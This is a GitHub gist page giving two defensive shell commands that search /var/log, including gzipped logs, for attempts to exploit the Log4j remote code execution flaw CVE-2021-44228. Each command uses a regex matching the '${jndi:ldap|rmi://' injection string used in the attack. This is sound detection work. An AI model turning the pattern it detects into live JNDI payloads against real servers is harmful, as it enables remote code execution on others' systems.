Skip to content

Instantly share code, notes, and snippets.

@tahslim

tahslim/log4j_rce_detection.md

Forked from Neo23x0/log4j_rce_detection.md
Created December 11, 2021 09:45
Show Gist options
  • Save tahslim/3c46c1aca15282fa562fdd6058e48fe8 to your computer and use it in GitHub Desktop.
Save tahslim/3c46c1aca15282fa562fdd6058e48fe8 to your computer and use it in GitHub Desktop.
Download ZIP
Log4j RCE CVE-2021-44228 Exploitation Detection
Raw
log4j_rce_detection.md

You can use these commands to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment